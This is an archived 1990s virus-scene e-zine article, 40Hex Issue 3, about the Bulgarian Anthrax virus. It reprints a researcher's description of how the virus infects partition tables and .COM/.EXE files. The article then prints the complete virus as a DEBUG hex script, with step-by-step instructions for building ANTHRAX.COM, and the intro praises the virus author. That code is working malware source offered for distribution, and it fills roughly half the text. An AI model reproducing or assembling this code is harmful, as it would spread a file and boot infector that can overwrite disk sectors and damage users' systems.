home *** CD-ROM | disk | FTP | other *** search

---

/ Hacker 2 / HACKER2.mdf / virus / 40hex_3.003

< prev

next >

Wrap

Text File  |  1995-01-03  |  9KB  |  190 lines

---

1.  40Hex Issue 3                                                      0003
2.  
3.                                 Anthrax
4.  
5.     Well, this is turning out to be a tribute issue to the Dark
6.     Avenger.  Here is another one of his better known viruses.  This is
7.     a nice one cause it not only is a file infector, but it is also a
8.     sort of boot sector virus.  It is also what I dubbed a reincarnation
9.     virus, meaning that even if you clean your system of it, it may
10.     still live, because it leaves a copy of itself on the last sector of
11.     the disk.  The virus can be reincarnated by the V2100 virus, also bu
12.     The Dark Avenger.
13.  
14.     Well, Patti Hoffman (one of my favorite people on earth, not) wrote
15.     this virus up.
16.  
17.  Aliases:
18.  V Status:    Rare [Not for long]
19.  Discovery:   July, 1990
20.  Symptoms:    .COM & .EXE growth
21.  Origin:      Bulgaria
22.  Isolated:    Netherlands
23.  Eff Length:  1040 - 1279 Bytes
24.  Type Code:   PRAKX - Parasitic Resident .COM, .EXE, & Partition Table Infector
25.  Detection Method:  ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+
26.  Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
27.  General Comments:
28.        The Anthrax Virus was isolated in July 1990 in the Netherlands after
29.        it was uploaded onto several BBSes in a trojan anti-viral program,
30.        USCAN.ZIP.  It is the second virus to be found in a copy of UScan
31.        during July 1990, the first virus being V2100.  Anthrax is a memory
32.        resident generic infector of .COM and .EXE files, including
33.        COMMAND.COM.
34.  
35.        The first time a program infected with the Anthrax virus is executed
36.        on the system's hard disk, the virus will infect the hard disk's
37.        partition table.  At this point, the virus is not memory resident.  It
38.        will also write a copy of itself on the last few sectors of the
39.        system's hard disk.  If data existed on those last few sectors of the
40.        hard disk, it will be destroyed.
41.  
42.        When the system is booted from the hard disk, the Anthrax virus
43.        will install itself memory resident.  It will remain memory resident
44.        until the first program is executed.  At that time, it will deinstall
45.        itself from being resident and infect one .COM or .EXE file.  This
46.        virus does not infect files in the current directory first, but
47.        instead starts to infect files at the lowest level of the disk's
48.        directory tree.
49.  
50.        Later, when an infected program is executed, Anthrax will infect one
51.        .COM or .EXE file, searching the directory structure from the lowest
52.        level of the directory tree.  If the executed infected program
53.        was located on the floppy drive, a .COM or .EXE file may or may not
54.        be infected.
55.  
56.        The Anthrax Virus's code is 1,024 bytes long, but infected programs
57.        will increase in length by 1,040 to 1,279 bytes.  On the author's test
58.        system, the largest increase in length experienced was 1,232 bytes.
59.        Infected files will always have an infected file length that is a
60.        multiple of 16.
61.  
62.        The following text strings can be found in files infected with the
63.        Anthrax virus:
64.  
65.                "(c)Damage, Inc."
66.                "ANTHRAX"
67.  
68.        A third text string occurs in the viral code, but it is in Cyrillics.
69.        Per Vesselin Bontchev, this third string translates to: "Sofia 1990".
70.  
71.        Since Anthrax infects the hard disk partition tables, infected systems
72.        must have the partition table disinfected or rebuilt in order to
73.        remove the virus.  This disinfection can be done with either a low-
74.        level format or use of the MDisk/P program for the correct DOS
75.        version after powering off and rebooting from a write-protected boot
76.        diskette for the system.  Any .COM or .EXE files infected with
77.        Anthrax must also be disinfected or erased.  Since a copy of the virus
78.        will exist on the last few sectors of the drive, these must also be
79.        located and overwritten.
80.  
81.        Anthrax interacts with another virus: V2100.  If a system which was
82.        previously infected with Anthrax should become infected with the V2100
83.        virus, the V2100 virus will check the last few sectors of the hard
84.        disk for the spare copy of Anthrax.  If the spare copy is found, then
85.        Anthrax will be copied to the hard disk's partition table.
86.  
87.        It is not known if Anthrax carries any destructive capabilities or
88.        trigger/activation dates.
89.  
90.  
91.  
92.  
93.        Here is the actual virus.  Well if this is your fist copy of
94.        40Hex, let me explain how to compile it.
95.  
96.        First copy what is below with your editor.  Then save it to a file
97.        called ANTHRAX.SCR.  Then type at the command line -
98.  
99.        DEBUG <ANTHRAX.SCR
100.  
101.        This will create a file called ANTHRAX.COM, that's the actual virus.
102.  
103. -------------------------------------------------------------------------------
104.  
105. n anthrax.com
106. e 0100  E9 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00
107. e 0110  95 8C C8 2D 00 00 BA 00 00 50 52 1E 33 C9 8E D9
108. e 0120  BE 4C 00 B8 CD 00 8C CA 87 44 44 87 54 46 52 50
109. e 0130  C4 1C B4 13 CD 2F 06 53 B4 13 CD 2F 58 5A 87 04
110. e 0140  87 54 02 52 50 51 56 A0 3F 04 A8 0F 75 6C 0E 07
111. e 0150  BA 80 00 B1 03 BB 77 06 B8 01 02 50 CD 13 58 B1
112. e 0160  01 BB 00 04 CD 13 0E 1F BE 9B 03 8B FB B9 5E 00
113. e 0170  56 F3 A6 5E 8B FB B9 62 00 56 F3 A4 5F BE 12 08
114. e 0180  B9 65 00 F3 A4 74 1E 89 4D E9 B1 5C 89 4D 9B 88
115. e 0190  6D DC B1 02 33 DB B8 02 03 CD 13 49 BB 00 04 B8
116. e 01A0  01 03 CD 13 49 B4 19 CD 21 50 B2 02 B4 0E CD 21
117. e 01B0  B7 02 E8 87 01 5A B4 0E CD 21 5E 1F 8F 04 8F 44
118. e 01C0  02 8F 44 44 8F 44 46 1F 1E 07 95 CB 28 63 29 20
119. e 01D0  44 61 6D 61 67 65 2C 20 49 6E 63 2E 00 B0 03 CF
120. e 01E0  06 1E 57 56 50 33 C0 8E D8 BE 86 00 0E 07 BF 08
121. e 01F0  06 FD AD AB A5 AF 87 F7 AD FC 74 11 1E 07 AF B8
122. e 0200  07 01 AB 8C C8 AB 8E D8 BF 68 00 A5 A5 58 5E 5F
123. e 0210  1F 07 2E FF 2E 00 06 06 1E 57 56 52 51 53 50 0E
124. e 0220  1F BE 06 06 33 C9 8E C1 BF 84 00 A5 A5 B4 52 CD
125. e 0230  21 26 8B 47 FE 8E D8 BB 03 00 03 07 40 8E D8 81
126. e 0240  07 80 00 0E 07 B7 12 E8 F2 00 58 5B 59 5A 5E 5F
127. e 0250  1F 07 2E FF 2E 06 06 C3 91 AE B4 A8 BF 20 31 39
128. e 0260  39 30 B8 00 3D CD 21 72 EE 93 B8 20 12 CD 2F 53
129. e 0270  26 8A 1D B8 16 12 CD 2F 5B BE 62 04 8B D6 B1 18
130. e 0280  B4 3F CD 21 33 C1 75 70 06 1F C6 45 02 02 33 D2
131. e 0290  EC 3C 10 72 FB 03 45 11 13 55 13 24 F0 3D 00 FB
132. e 02A0  73 56 89 45 15 89 55 17 0E 1F 50 B1 10 F7 F1 2B
133. e 02B0  44 08 8B C8 2B 44 16 A3 04 00 AD 35 4D 5A 74 03
134. e 02C0  35 17 17 9C 75 17 89 04 3B 44 0A 87 44 12 A3 07
135. e 02D0  00 89 4C 14 B9 DC 04 74 07 83 44 08 48 B9 65 00
136. e 02E0  51 B9 9B 03 B4 40 CD 21 33 C8 59 75 09 BA 00 04
137. e 02F0  B4 40 CD 21 33 C8 5A 58 75 38 26 89 4D 15 26 89
138. e 0300  4D 17 52 9D 75 18 26 8B 45 11 26 8B 55 13 B5 02
139. e 0310  F7 F1 85 D2 74 01 40 89 14 89 44 02 EB 0A C6 44
140. e 0320  FE E9 05 28 03 89 44 FF B9 18 00 8D 54 FE B4 40
141. e 0330  CD 21 26 80 4D 06 40 B4 3E CD 21 C3 8E D9 8A 1E
142. e 0340  6C 04 0E 1F FF 06 5E 04 BA 4B 06 E8 1F 00 BE 0A
143. e 0350  06 C6 04 5C 46 32 D2 B4 47 CD 21 BA 9B 03 B4 3B
144. e 0360  CD 21 E3 0D B4 51 CD 21 8E DB BA 80 00 B4 1A EB
145. e 0370  C8 72 3E BE 9C 03 32 D2 B4 47 CD 21 3A 2E DC 03
146. e 0380  B1 32 BA 9D 02 B4 4E 74 5C CD 21 72 24 BA 4B 06
147. e 0390  B8 01 4F BE DC 03 BF 68 06 AA B1 0D F3 A6 74 45
148. e 03A0  3A 6D FE 74 40 CD 21 73 E4 32 C0 EB D3 2A 2E 2A
149. e 03B0  00 B1 41 BF 9C 03 3A 2D 8A C5 A2 DC 03 74 69 F2
150. e 03C0  AE 4F B1 41 B0 5C FD F2 AE 8D 75 02 BF DC 03 FC
151. e 03D0  AC 84 C0 AA 75 FA BA CD 02 32 C9 EB 81 2E 2E 00
152. e 03E0  BA 4B 06 B4 4F CD 21 72 C8 BE 69 06 BF DC 03 80
153. e 03F0  3C 2E 74 EC 88 2D 8B D6 F6 44 F7 10 75 DB AC 84
154. e 0400  C0 AA 75 FA 4E FD AD AD FC 3D 58 45 74 05 3D 4F
155. e 0410  4D 75 CD 53 E8 4B FE 5B 33 C9 8E C1 26 A0 6C 04
156. e 0420  0E 07 2A C3 3A C7 72 B8 BA 80 00 B1 03 BB 00 02
157. e 0430  B8 01 03 CD 13 BA 0A 06 E9 23 FF 95 BF 00 01 8B
158. e 0440  5D 01 81 EB 28 02 8B C7 8D B7 FD 03 A5 A4 93 B1
159. e 0450  04 D3 E8 8C D9 03 C1 BA 0B 00 EB 71 B8 D0 00 FC
160. e 0460  87 85 68 FA AB 8C C8 E2 F7 A3 86 00 AB 8E D8 B4
161. e 0470  08 CD 13 49 49 A1 E9 03 84 E4 74 01 91 B2 80 B8
162. e 0480  03 03 CD 13 91 84 E4 75 02 2C 40 FE CC A3 E9 03
163. e 0490  FF 06 60 04 32 F6 B9 01 00 BB 00 04 B8 01 03 CD
164. e 04A0  13 8A D6 CB 41 4E 54 48 52 41 58 0E 1F 83 2E 13
165. e 04B0  04 02 CD 12 B1 06 D3 E0 8E C0 BF 00 04 BE 00 7C
166. e 04C0  B9 00 01 8B DE FC F3 A5 8E D8 BA 27 04 51 53 50
167. e 04D0  52 CB 8E C1 B1 04 BE B0 05 83 C6 0E AD 3C 80 74
168. e 04E0  04 E2 F6 CD 18 92 FD AD 91 B8 01 02 CD 13 81 3E
169. e 04F0  FE 05 55 AA 75 ED 06 1E 07 1F 32 F6 B9 02 00 33
170. e 0500  DB B8 02 02 CD 13 E9 EE FE 00 00 00 00 CD 20 CC
171. e 0510  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
172. e 0520  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
173. e 0530  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
174. e 0540  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
175. e 0550  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
176. e 0560  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
177. e 0570  1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
178.  
179. rcx
180. 480
181. w
182. q
183.  
184. -------------------------------------------------------------------------------
185.                                                                      HR
186.  
187.  
188. 
189. Downloaded From P-80 International Information Systems 304-744-2253
190.